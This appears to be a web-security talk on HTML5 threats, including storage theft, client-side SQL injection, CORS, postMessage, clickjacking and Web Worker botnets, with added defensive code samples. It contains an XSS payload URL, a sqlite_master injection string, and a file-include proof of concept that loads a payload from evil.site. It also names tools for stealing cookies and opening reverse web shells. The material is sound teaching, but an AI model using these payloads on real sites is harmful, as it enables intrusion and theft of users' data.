youstar@insight-labs
   Introduction to HTML5
   HTML5 threat model
   Vulnerabilities & Defense
   Tools
   Reference
   History
     HTML1.0——1993.6 Not Standard
     HTML 2.0——1995.11 RFC 1866
     HTML 3.2——1996.1.14 W3C Recommended Standard
     HTML 4.0——1997.12.18 W3C Recommended Standard
     HTML 4.01——1999.12.24 W3C Recommended Standard
     XHTML——2000.1.20 W3C Recommended Standard
     HTML5——2008 First Draft Standard
               2012 W3C Candidate Recommendation
   Features
     The three aspects of HTML5
      ▪ Content: HTML
        ▪ New tags and attributes
      ▪ Presentation of content: CSS
      ▪ Interaction with content: JavaScript
        ▪ New APIs: Drag and Drop, LocalStorage, Web Workers, etc.
   Features
   XSS abuse with tags and attributes
   Hiding URL Code
   Stealing from the storage
   Injecting and Exploiting WebSQL
   ClickJacking && CookieJacking
   Cross Origin Request and postMessage
   Client‐side File Includes
   Botnet and widgets
   In:
     New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>
     New attributes for tags: autocomplete, autofocus, pattern (a regex) for <input>
         New media events
         New <canvas> tag for 2D rendering
         New form controls for date and time
         Geolocation
         New selectors
         Client-side storage including localStorage, sessionStorage, and WebSQL
   Out:
         Presentation elements such as <font>, <center>
         Presentation attributes including align, border
         <frame>,<frameset>
         <applet>
         Old special effects: <marquee>,<bgsound>
         <noscript>
   Attack:
     New XSS Vector
     Bypass Black-list Filter


   Defense:
     Add new tags to Black-list
     Change Regex
   DOM
     window.history.back();
     window.history.forward();
     window.history.go();
   HTML5
     history.pushState()
      ▪ history.pushState(state object,title,URL);
     history.replaceState()
      ▪ Same signature as pushState, but modifies the current
        history entry instead of adding a new one.
Payload URL (the injected script rewrites the address bar to drop the query string):
http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState({},'',location.href.split("?").shift());document.write(1)</script>

Address bar after the payload runs:
http://127.0.0.1/html5/poc/history/xsspoc.php
   Type
     LocalStorage: for long-term storage (persists across browser restarts)
     SessionStorage: per-session storage (lasts only until the browser
      window or tab is closed)
   Differences
     Cookies: 4 KB
     LocalStorage / SessionStorage: depends on the
      browser (usually 5 MB)
   Support
     Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera
      10.50
   Function
     (localStorage | sessionStorage).setItem(key, value)
     (localStorage | sessionStorage).getItem(key)
     (localStorage | sessionStorage).removeItem(key)
     (localStorage | sessionStorage).clear()
   Attack
     Get the data from the storage (cookies, passwords, etc.)
     Store your XSS payload persistently in the storage
     No path scoping: storage is shared by the whole origin, unlike a cookie's path
   Defense
     Don’t store sensitive data in local storage
     Don't use local storage for session identifiers
     Stick with cookies and use the HTTPOnly and
     Secure flags
   Database Storage
     The same as the Google Gears
   Operate
     var db = openDatabase("Database Name", "Database Version", "Database Description", estimatedSize);
     db.transaction(function (tx) {
       tx.executeSql("YOUR SQL STATEMENT HERE", [/* bound parameters */], successCallback, errorCallback);
     });

   Type
     SQLite (support by WebKit)
   Attack
     Store shellcode
     SQL inject
   Defense
     Be strict about SQL operations (bind parameters with ?, never concatenate input)
     Encode the sql result before display
     Don’t store sensitive data
   Store shellcode
   SQL Injection
     Use sqlite_master
      ▪ SELECT name FROM sqlite_master WHERE type='table'
      ▪ SELECT sql FROM sqlite_master WHERE name='table_name'
      ▪ SELECT sqlite_version()
     Select with ?
      ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id);   False (input concatenated into the SQL text)
      ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True (input passed as a bound parameter)
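The two executeSql calls above, replayed against a constructed SQLite database as an added example (not code from the deck): Python's sqlite3 module stands in for the Web SQL executeSql call, since Web SQL is SQLite underneath. The `stud` table and the `sqlite_master` query are the deck's; the `secrets` table, its token and the rendering helper are constructed for the demonstration.

```python
import html
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema: the deck's 'stud' table plus a second
    table standing in for whatever else a page keeps in Web SQL."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE stud (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, token TEXT);
        INSERT INTO stud VALUES (1, 'alice'), (2, 'bob');
        INSERT INTO secrets VALUES (1, 'constructed-session-token');
        """
    )
    return conn


def lookup_concat(conn: sqlite3.Connection, input_id: str) -> List[str]:
    """Mirrors executeSql("SELECT name FROM stud WHERE id=" + input_id), the
    call the deck marks False: the input becomes part of the SQL text, so any
    SQL it contains is executed."""
    sql = "SELECT name FROM stud WHERE id=" + input_id
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn: sqlite3.Connection, input_id: str) -> List[str]:
    """Mirrors executeSql("SELECT name FROM stud WHERE id=?", [input_id]), the
    call the deck marks True: the engine receives the input as a bound value,
    never as SQL text. SQLite's numeric affinity turns "2" into 2; a
    non-numeric string simply matches no row."""
    rows = conn.execute("SELECT name FROM stud WHERE id=?", (input_id,))
    return [row[0] for row in rows]


def render_names(names: List[str]) -> str:
    """The deck's third defence: HTML-encode query results before they reach
    the page, so a payload stored in the database stays inert on display."""
    items = "".join("<li>%s</li>" % html.escape(n) for n in names)
    return "<ul>" + items + "</ul>"


# The deck's sqlite_master enumeration, supplied as the user input, shows the
# difference between the two call styles on identical data.
ENUM_TABLES = "1 UNION SELECT name FROM sqlite_master WHERE type='table'"

if __name__ == "__main__":
    db = make_db()
    print("concat, benign input:  ", lookup_concat(db, "2"))
    print("concat, enum input:    ", lookup_concat(db, ENUM_TABLES))  # table names leak
    print("param,  enum input:    ", lookup_param(db, ENUM_TABLES))   # []
    print(render_names(["<b>bob</b>"]))
```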
   Drag and drop basics
     Drag Data
     the drag feedback image
     drag effects
   Drag events:
       dragstart
       dragenter
       dragover
       dragleave
       drag
       drop
       dragend
   ClickJacking
     XSS + Drag
   CookieJacking
     Combines several techniques to steal the user's local cookie files
   Technology
     How to read the local file: iframe + file://
     How to detect the state of cookies: clickjacking
     How to send the cookies: SMB
   Defense
     Use iframe with sandbox
     Frame busting:
      if (top !== window) top.location = window.location.href;
      if (top != self) top.location.href = self.location.href;
   postMessage
     Send
      ▪ otherWindow.postMessage(message, targetOrigin);
     Receive
      window.addEventListener("message", receiveMessage, false);
      function receiveMessage(event)
      {
        if (event.origin !== "http://example.org:8080")
          return;
        // ...
      }
   Defense
     Check the postMessage origin
     Don’t use innerHTML
      ▪ Element.innerHTML=e.data;//danger
      ▪ Element.textContent=e.data;//safe
     Don't use eval() to process the message
   Cross-Origin Resource Sharing
     ▪ Originally Ajax calls were subject to Same Origin Policy
     ▪ Site A cannot make XMLHttpRequests to Site B
     ▪ HTML5 makes it possible to make these cross domain calls
     ▪ Site ASite B(Response must include a header)
       ▪ Access-Control-Allow-Origin: Site A       Must
       ▪ Access-Control-Allow-Credentials: true | false
       ▪ Access-Control-Expose-Headers:
       ▪ etc
   Defense
     Don’t set this: Access-Control-Allow-Origin: *
      ▪ (the same mistake as an open Flash crossdomain.xml)
     Prevent DDOS
      ▪ if (origin == "Site A") { header("Access-Control-Allow-Origin: Site A"); ... // process request }
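The allow-list check from the slide above, written out as an added example (not the deck's code): a server-side decision function for one request, plus a checker that flags the misconfigurations the deck warns about in response headers already observed (for example, captured from a proxy). The origins are constructed; "Site A" in the deck's terms is site-a.example here.

```python
from typing import Dict, List, Optional

# Constructed allow-list standing in for the deck's "Site A". Entries are exact
# origins (scheme + host + port), never bare hostnames or substrings.
ALLOWED_ORIGINS = frozenset({
    "https://site-a.example",
    "https://app.site-a.example",
})


def cors_headers(origin: Optional[str], allow_credentials: bool = False) -> Dict[str, str]:
    """Decide the CORS response headers for one request.

    The deck's rule, if (origin == "Site A") { header(...) }, with two
    refinements: an unknown or missing Origin gets no CORS headers at all (no
    echo of the request origin, no fallback to '*'), and a reflected origin is
    always paired with Vary: Origin so a shared cache cannot hand one origin's
    response to another.
    """
    if not origin or origin not in ALLOWED_ORIGINS:  # exact match, not a substring test
        return {}
    headers = {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
    if allow_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def audit_cors(headers: Dict[str, str]) -> List[str]:
    """Return finding codes for a set of response headers; [] means clean.

    Flags the wildcard the deck says not to set, the (browser-rejected but
    still telling) wildcard-plus-credentials combination, a reflected origin
    that is not on the allow-list, and a reflected origin without Vary: Origin.
    """
    findings: List[str] = []
    acao = headers.get("Access-Control-Allow-Origin")
    creds = headers.get("Access-Control-Allow-Credentials", "").strip().lower() == "true"
    vary = {v.strip().lower() for v in headers.get("Vary", "").split(",")}
    if acao is None:
        return findings  # no cross-origin exposure at all
    if acao == "*":
        findings.append("wildcard-origin")
        if creds:
            findings.append("wildcard-with-credentials")
    else:
        if acao not in ALLOWED_ORIGINS:
            findings.append("origin-not-in-allowlist")
        if "origin" not in vary:
            findings.append("missing-vary-origin")
    return findings


if __name__ == "__main__":
    for o in ["https://site-a.example", "https://site-a.example.other.example", None]:
        print(o, "->", cors_headers(o, allow_credentials=True))
    print(audit_cors({"Access-Control-Allow-Origin": "*",
                      "Access-Control-Allow-Credentials": "true"}))
```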
   Code like this:
<html><body><script>
x = new XMLHttpRequest();
x.open("GET",location.hash.substring(1));
x.onreadystatechange=function(){if(x.readyState==4){
document.getElementById("main").innerHTML=x.responseText;}}
x.send();
</script>
<div id="main"></div>
</body></html>
 POC
       With cross-origin requests allowed: http://example.com/#http://evil.site/payload.php
       The contents of 'payload.php' will be included as HTML within <div id="main"></div>
       A new type of XSS!!
   Web Workers
     running scripts in the background independently
     Very simple
        var w = new Worker("some_script.js");
        w.onmessage = function (e) { /* do something */ };
        w.terminate();
     Access
      ▪ XHR,navigator object,application cache,spawn other workers!
     Can’t access
      ▪ DOM,window,document objects
   Attack
     Botnet
      ▪ Application‐level DDoS attacks
      ▪ Email Spam
      ▪ Distributed password cracking
     Network Scanning
     Guessing User’s Private IP Address
      ▪ Identify the user’s subnet
      ▪ Identify the IP address
   COR+XSS+Workers=shell of the future
   HTML5CSdump
     enumeration and extraction techniques described
     before to obtain all the client-side storage relative
     to a certain domain name
   JS-Recon
     Port Scans
     Network Scans
     Detecting private IP address
   Imposter
       Steal cookies
       Set cookies
       Steal Local Shared Objects
       Steal stored passwords from FireFox
       etc
   Shell of the Future
     Reverse Web Shell handler
     Bypass anti-session hijacking measures
   Ravan
     JavaScript based Distributed Computing system
     hashing algorithms
      ▪ MD5
      ▪ SHA1
      ▪ SHA256
      ▪ SHA512
 New security threats brought by HTML5: xisigr
 Attacking with HTML5:lavakumark
 Abusing HTML5:Ming Chow
 HTML5 Web Security:Thomas Röthlisberger
 Abusing HTML 5 Structured Client-side Storage:Alberto Trivero
 Cookiejacking:Rosario Valotta
 http://heideri.ch/jso/#html5
 http://www.wooyun.org/bugs/wooyun-2011-02351
 http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
 http://www.html5test.com
   http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
   http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
   http://code.google.com/intl/zh-CN/apis/gears/api_database.html
   http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
   http://www.w3.org/TR/access-control/
   http://m-austin.com/blog/?p=19
   https://developer.mozilla.org/en/
   http://www.w3.org/TR/cors/
   http://www.andlabs.org/tools/ravan.html
   http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/
   Contact Me
   email:youstar@foxmail.com
   Site:
     www.codesec.info

     www.insight-labs.org

Talk about html5 security

  • 2. Introduction to HTML5  HTML5 threat model  Vulnerabilities & Defense  Tools  Reference
  • 3. History  HTML1.0——1993.6 Not Standard  HTML 2.0——1995.11 RFC 1866  HTML 3.2——1996.1.14 W3C Recommended Standard  HTML 4.0——1997.12.18 W3C Recommended Standard  HTML 4.01——1999.12.24 W3C Recommended Standard  XHTML——2000.1.20 W3C Recommended Standard  HTML5——2008 First Draft Standard  2012 W3C Candidate Recommendation
  • 4. Features  The three aspects of HTML5 ▪ Content HTML ▪ New Tags and Attributes ▪ Presentation of content CSS ▪ Interaction with content JavaScript ▪ Add New API Drag LocalStorage WebWorkers etc
  • 5. Features
  • 6.
  • 7.
  • 8. XSS abuse with tags and attributes  Hiding URL Code  Stealing from the storage  Injecting and Exploiting WebSQL  ClickJacking &&CookieJacking  Cross Origin Request and postMessage  Client‐side File Includes  Botnet and widgets
  • 9. In:  New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>  New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for input  New media events  New <canvas> tag for 2D rendering  New form controls for date and time  Geolocation  New selectors  Client-side storage including localStorage, sessionStorage, and WebSQL  Out:  Presentation elements such a <font>, <center>  Presentation attributes including align, border  <frame>,<frameset>  <applet>  Old special effects: <marquee>,<bgsound>  <noscript>
  • 10. Attack:  New XSS Vector  Bypass Black-list Filter  Defense:  Add new tags to Black-list  Change Regex
  • 11.
  • 12. DOM  window.history.back();  window.history.forward();  window.history.go();  HTML5  history.pushState() ▪ history.pushState(state object,title,URL);  history.replaceState() ▪ The same with pushState,but modifies the current history entry.
  • 14.
  • 15. Type  LocalStorage:for long-term storage  SessionStorage:for the session application(last when the browser closed)  Differences  Cookies:4k  LocalStorage/ SessionStorage:depends on browser(usually 5MB)  Support  Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
• 17. Function
   (localStorage | sessionStorage).setItem(key, value)
   (localStorage | sessionStorage).getItem(key)
   (localStorage | sessionStorage).removeItem(key) (the Storage API has no deleteItem())
   (localStorage | sessionStorage).clear()
   (localStorage | sessionStorage).length and .key(index) to enumerate every stored key
• 18. Attack
   Get the data out of the storage (copied cookies, passwords, tokens, etc.) from any XSS in the origin: unlike an HttpOnly cookie, storage is always readable by script
   Store your XSS shellcode in it: a persistent payload that the page re-executes on every load
   No path restriction: storage is scoped by origin only, so every page on the origin (and an XSS anywhere on it) can read it, whereas a cookie can at least be limited by path
  Defense
   Don't store sensitive data in local storage
   Don't use local storage for session identifiers
   Stick with cookies and use the HttpOnly and Secure flags
• 20. Database Storage (Web SQL Database)
   The same model as Google Gears: a full SQL database per origin, exposed to JavaScript
  Operate
   var db = openDatabase("Database Name", "Database Version", "Database Description", estimatedSizeInBytes);
   db.transaction(function (tx) { tx.executeSql("YOUR SQL STATEMENT HERE", [args], onSuccess, onError); });
   executeSql() is called on the transaction object inside the transaction callback, not on the database directly
  Type
   SQLite (supported by WebKit browsers only; the W3C stopped work on the spec in 2010 and the API has since been removed from current Chromium releases)
• 21. Attack
   Store shellcode (a persistent payload kept in the client-side database)
   SQL injection (client-side, against the browser's own SQLite database)
  Defense
   Be strict with the SQL operations: use parameterized statements (? placeholders with an argument array), never string concatenation
   Encode the SQL result before displaying it; treat everything read back from the database as untrusted
   Don't store sensitive data
  • 22. Store shellcode
• 23. SQL Injection
   Use sqlite_master to enumerate the schema
  ▪ SELECT name FROM sqlite_master WHERE type='table'
  ▪ SELECT sql FROM sqlite_master WHERE name='table_name'
  ▪ SELECT sqlite_version()
   Select with ?
  ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id);      False: the input becomes part of the SQL text
  ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]);    True: the input is bound as a value
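An added example (not from the slides) for slides 21 and 23 that shows why the two executeSql() forms differ. A recording stand-in for the Web SQL transaction object captures exactly what would reach SQLite; with concatenation the schema-recon payload becomes part of the query text, with a ? placeholder the query text never changes and the payload travels in the argument array. The stud table, the payload and the escapeHtml() output encoding used for the "encode the SQL result before display" defense are assumptions for the example.

```javascript
// Added example: client-side SQL injection vs. parameter binding (not code from the slides).

// Stand-in for the `tx` object a real db.transaction(callback) hands to you:
// records every executeSql(sql, args) call instead of running it.
function recordingTx() {
  const calls = [];
  return {
    calls,
    executeSql(sql, args) { calls.push({ sql, args: args || [] }); },
  };
}

// Vulnerable (slide 23, "False"): the attacker's string is spliced into the SQL text.
function lookupStudentVulnerable(tx, inputId) {
  tx.executeSql("SELECT name FROM stud WHERE id=" + inputId);
}

// Safe (slide 23, "True"): the SQL text is constant, the value is bound separately.
function lookupStudentSafe(tx, inputId) {
  tx.executeSql("SELECT name FROM stud WHERE id=?", [inputId]);
}

// Schema-recon payload built from slide 23's sqlite_master query: appended to the
// vulnerable query it returns the CREATE statement of every table in the database.
const RECON_PAYLOAD = "0 UNION SELECT sql FROM sqlite_master";

// Slide 21's "encode the SQL result before display": anything read back from the
// database may have been planted by an earlier injection or by stored shellcode.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Run both lookups with the same attacker input and return what SQLite would see.
function demo() {
  const tx = recordingTx();
  lookupStudentVulnerable(tx, RECON_PAYLOAD);
  lookupStudentSafe(tx, RECON_PAYLOAD);
  return tx.calls;
}
```

The first recorded call shows the query SQLite would parse: `SELECT name FROM stud WHERE id=0 UNION SELECT sql FROM sqlite_master`; the second is the unchanged `... WHERE id=?` with the payload held as a plain value that SQLite compares against the id column and never parses.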
• 24. Drag and drop basics
   Drag data (the DataTransfer object)
   The drag feedback image
   Drag effects (copy, move, link)
   Drag events: dragstart, dragenter, dragover, dragleave, drag, drop, dragend
• 26. ClickJacking: XSS + Drag
   A framed victim page plus drag-and-drop: the user is lured into dragging attacker-chosen text onto an invisible form field of the framed page (or the framed page's content onto an attacker-controlled field), so clickjacking becomes a way to plant content in the victim's own inputs and deliver an XSS payload.
• 28. CookieJacking
   Combines several techniques to steal the user's local cookie files (Rosario Valotta, see the references)
  Technology
   How to read the local file: iframe + file://
   How to detect the state of the cookies: clickjacking
   How to send the cookies: SMB
• 30. Defense
   Use iframe with sandbox for content you embed: a sandboxed frame cannot run scripts, submit forms or navigate the top window unless you explicitly allow it
   Frame-busting script, either form:
  ▪ if (top !== window) top.location = window.location.href;
  ▪ if (top != self) top.location.href = self.location.href;
   Caveat: the sandbox attribute cuts both ways. An attacker who frames your page with <iframe sandbox="allow-scripts allow-forms"> (no allow-top-navigation) silently disables the frame-busting script, so send the X-Frame-Options: DENY (or SAMEORIGIN) response header, or the CSP frame-ancestors directive, and keep the script only as a fallback.
• 31. postMessage
   Send
  ▪ otherWindow.postMessage(message, targetOrigin);
   Receive
  window.addEventListener("message", receiveMessage, false);
  function receiveMessage(event) {
    if (event.origin !== "http://example.org:8080") return;
    // ...
  }
• 33. Defense
   Check the postMessage origin: compare event.origin exactly against an allowlist (a substring or startsWith check accepts http://example.org:8080.evil.site), and when sending, pass a concrete targetOrigin instead of "*" so the data cannot be read by a window that has navigated elsewhere
   Don't use innerHTML
  ▪ element.innerHTML = e.data;    // danger
  ▪ element.textContent = e.data;  // safe
   Don't use eval() to deal with the message; parse structured data with JSON.parse() and validate the result
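A receiver that applies all three defenses from slide 33, as an added example that is not part of the slides. The handler takes the message event as a parameter so it can be driven with constructed events here; in a page it would be registered with window.addEventListener("message", handleMessage). The allowed origin is the one from slide 31; the {type, payload} message format, the child window origin and the element stand-in are assumptions for the example.

```javascript
// Added example: hardened postMessage receiver and sender (not code from the slides).

const ALLOWED_ORIGINS = new Set(["http://example.org:8080"]);

// Returns the accepted, parsed message, or null if it was rejected. Returning the
// decision (instead of acting on it here) is what keeps it testable.
function handleMessage(event) {
  // 1. Exact origin match. startsWith/indexOf would accept http://example.org:8080.evil.site.
  if (!ALLOWED_ORIGINS.has(event.origin)) return null;

  // 2. Never eval() the message: parse strictly and validate the shape.
  let msg;
  try {
    msg = typeof event.data === "string" ? JSON.parse(event.data) : event.data;
  } catch (e) {
    return null; // not JSON (e.g. "alert(1)"): drop it
  }
  if (!msg || typeof msg.type !== "string" || typeof msg.payload !== "string") return null;
  return msg;
}

// 3. Render as text, never as HTML. `target` is a minimal element stand-in
//    ({ textContent }); in a page it would be a real DOM element.
function renderMessage(target, msg) {
  target.textContent = msg.payload; // not target.innerHTML = msg.payload
  return target.textContent;
}

// Sender side: a concrete targetOrigin, never "*", so the message is only delivered
// if the child window is still on the origin we expect. The origin is an assumption.
const CHILD_ORIGIN = "https://child.example.org";
function sendToChild(childWindow, msg) {
  childWindow.postMessage(JSON.stringify(msg), CHILD_ORIGIN);
}
```

With these checks a message from an unlisted origin, a look-alike origin, a non-JSON string or a malformed object is dropped before any of it touches the DOM, and a payload that does get through is inserted as inert text.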
• 34. Cross-Origin Resource Sharing
  ▪ Originally Ajax calls were subject to the Same Origin Policy
  ▪ Site A cannot read the response of an XMLHttpRequest to Site B
  ▪ HTML5 (CORS) makes these cross-domain calls possible
  ▪ Site A → Site B: the response must include a header
  ▪ Access-Control-Allow-Origin: Site A   (required)
  ▪ Access-Control-Allow-Credentials: true | false   (whether cookies/HTTP auth are sent and the response may be read)
  ▪ Access-Control-Expose-Headers: ...
  ▪ etc.
• 37. Defense
   Don't set this: Access-Control-Allow-Origin: * (the same mistake as a wide-open Flash crossdomain.xml)
   Don't reflect the request's Origin header blindly either; browsers refuse * together with credentials, so an origin that is echoed back with Access-Control-Allow-Credentials: true is the pattern that actually exposes authenticated data
   Prevent DDoS / abuse: validate the Origin against an allowlist before doing any expensive work
  ▪ if (origin == "Site A") { header("Access-Control-Allow-Origin: Site A"); ... // process request }
   Note that the browser still sends a simple cross-origin GET or POST even when the response carries no CORS header; CORS only controls whether the calling page may read the response, so the allowlist protects the data, not the server's capacity
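The server side of slide 37 as an added example (not code from the slides): a weak policy that reflects whatever Origin the request carries, next to a hardened one that matches the Origin exactly against an allowlist. The request/response handling is written in the shape of Node's http module (req.method, req.headers) but returns the status and headers instead of sending them, so it runs without a socket. The allowed origins, the preflight method list and the response body are assumptions for the example.

```javascript
// Added example: CORS origin allowlist vs. origin reflection (not code from the slides).

const ALLOWED_ORIGINS = new Set(["https://app.example.com", "https://admin.example.com"]);

// Weak: mirrors the Origin header (or falls back to "*"). Combined with
// Allow-Credentials: true, any site can read this server's authenticated responses.
function corsHeadersReflecting(origin) {
  return {
    "Access-Control-Allow-Origin": origin || "*",
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened: exact match only (a startsWith/substring check would accept
// https://app.example.com.evil.site), Vary: Origin so a shared cache never serves
// one origin's answer to another, and no CORS headers at all for everyone else.
function corsHeadersAllowlisted(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Decide the response for one request under the given policy.
// Returns { status, headers, body } instead of writing to a socket.
function handleRequest(req, policy) {
  const cors = policy(req.headers.origin);
  if (req.method === "OPTIONS") { // preflight for non-simple requests
    if (Object.keys(cors).length === 0) return { status: 403, headers: {}, body: "" };
    return {
      status: 204,
      headers: {
        ...cors,
        "Access-Control-Allow-Methods": "GET, POST",
        "Access-Control-Allow-Headers": "Content-Type",
      },
      body: "",
    };
  }
  // The resource is still served: CORS only decides whether the calling page may
  // READ the response; without an Allow-Origin header the browser discards it.
  return {
    status: 200,
    headers: { "Content-Type": "application/json", ...cors },
    body: JSON.stringify({ secret: "account data" }), // constructed sample body
  };
}

// Constructed sample request from an attacker-controlled page.
const attackerRequest = { method: "GET", headers: { origin: "http://evil.site" } };
```

Under the reflecting policy the attacker's page gets `Access-Control-Allow-Origin: http://evil.site` plus credentials and can read the account data; under the allowlist the same request is answered without any CORS header and the browser keeps the body from the page. Note the 200 in both cases: the request reached the server either way, which is why the "Prevent DDoS" bullet on slide 37 needs rate limiting in addition to the origin check.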
• 38. Code like this:
  <html><body><script>
  x = new XMLHttpRequest();
  x.open("GET", location.hash.substring(1));
  x.onreadystatechange = function () {
    if (x.readyState == 4) {
      document.getElementById("main").innerHTML = x.responseText;
    }
  };
  x.send();
  </script>
  <div id="main"></div>
  </body></html>
   POC
  ▪ http://example.com/#http://evil.site/payload.php
  ▪ The contents of 'payload.php' will be included as HTML within <div id="main"></div>: the attacker's server answers with Access-Control-Allow-Origin: http://example.com (or *), so the cross-origin XHR succeeds and the response is written straight into the DOM
   A new type of XSS (client-side file include): the injection travels in the fragment, which the browser never sends to the server, so server-side filters and logs never see it
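A hardened version of slide 38's include logic, as an added example that is not part of the slides. The include target taken from location.hash is only accepted if it resolves to the page's own origin and to a path under an allowlisted directory; absolute URLs, protocol-relative //evil.site/... URLs, javascript:/data: schemes and ../ escapes are all rejected by the same two checks, so a link like http://example.com/#http://evil.site/payload.php no longer pulls attacker HTML into the page. The page origin, the /pages/ prefix and the text-only insertion are assumptions for the example.

```javascript
// Added example: validating a client-side include target (not code from the slides).

const PAGE_ORIGIN = "http://example.com";  // in a page: window.location.origin
const ALLOWED_PREFIX = "/pages/";          // assumed directory of includable fragments

// Returns an absolute same-origin URL to fetch, or null to refuse the include.
function resolveIncludeTarget(hash, pageOrigin = PAGE_ORIGIN) {
  const raw = hash.startsWith("#") ? hash.slice(1) : hash;
  if (raw === "") return null;
  let url;
  try {
    url = new URL(raw, pageOrigin + "/"); // relative paths resolve against our own origin
  } catch (e) {
    return null;                          // unparsable input
  }
  // One comparison covers absolute cross-origin URLs, protocol-relative URLs and
  // javascript:/data: URLs (their origin is "null", never equal to ours).
  if (url.origin !== pageOrigin) return null;
  // URL normalisation has already collapsed "..", so a prefix check blocks escapes.
  if (!url.pathname.startsWith(ALLOWED_PREFIX)) return null;
  return url.href;
}

// Browser side: fetch the vetted target and insert it as text (textContent), not
// innerHTML. fetchFn is injected so the function can be exercised without a network.
function includeFragment(fetchFn, hash, target) {
  const resolved = resolveIncludeTarget(hash);
  if (resolved === null) return Promise.resolve(false);
  return fetchFn(resolved)
    .then((r) => r.text())
    .then((text) => { target.textContent = text; return true; });
}
```

If the fragment really has to be rendered as HTML, run the response through an HTML sanitizer before assigning it; the origin check alone does not make a same-origin response safe to write with innerHTML if that resource can itself carry user-supplied markup.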
• 40. Web Workers
   Run scripts in the background, independently of the page's UI thread
   Very simple:
  var w = new Worker("some_script.js");
  w.onmessage = function (e) {
    // do something with e.data
  };
  w.terminate();
   Can access: XHR, the navigator object, the application cache, and they can spawn other workers
   Can't access: the DOM, window and document objects
• 41. Attack
   Botnet
  ▪ Application-level DDoS attacks
  ▪ Email spam
  ▪ Distributed password cracking
   Network scanning
   Guessing the user's private IP address
  ▪ Identify the user's subnet
  ▪ Identify the IP address
• 42. CORS + XSS + Web Workers = Shell of the Future
   An XSS payload on the victim site keeps a worker running in the victim's browser that talks to the attacker's server over cross-origin XHR and replays the attacker's requests from inside the victim's authenticated session: a reverse web shell (the tool is on slide 44).
• 43. HTML5CSdump
   Uses the enumeration and extraction techniques described before to obtain all the client-side storage belonging to a given domain name
  JS-Recon
   Port scans
   Network scans
   Detecting the private IP address
• 44. Imposter
   Steal cookies
   Set cookies
   Steal Local Shared Objects
   Steal stored passwords from Firefox
   etc.
  Shell of the Future
   Reverse web shell handler
   Bypasses anti-session-hijacking measures (the requests come from the victim's own browser, so IP and User-Agent binding do not help)
• 45. Ravan
   JavaScript-based distributed computing system: visitors' browsers crack hashes in Web Workers
   Hashing algorithms
  ▪ MD5
  ▪ SHA1
  ▪ SHA256
  ▪ SHA512
• 46. Reference
   HTML5 带来的新安全威胁 (New security threats brought by HTML5): xisigr
   Attacking with HTML5: lavakumark
   Abusing HTML5: Ming Chow
   HTML5 Web Security: Thomas Röthlisberger
   Abusing HTML 5 Structured Client-side Storage: Alberto Trivero
   Cookiejacking: Rosario Valotta
   http://heideri.ch/jso/#html5
   http://www.wooyun.org/bugs/wooyun-2011-02351
   http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
   http://www.html5test.com
• 47. Reference (continued)
   http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
   http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
   http://code.google.com/intl/zh-CN/apis/gears/api_database.html
   http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
   http://www.w3.org/TR/access-control/
   http://m-austin.com/blog/?p=19
   https://developer.mozilla.org/en/
   http://www.w3.org/TR/cors/
   http://www.andlabs.org/tools/ravan.html
   http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/
• 48. Contact Me
   email: youstar@foxmail.com
   Site
  ▪ www.codesec.info
  ▪ www.insight-labs.org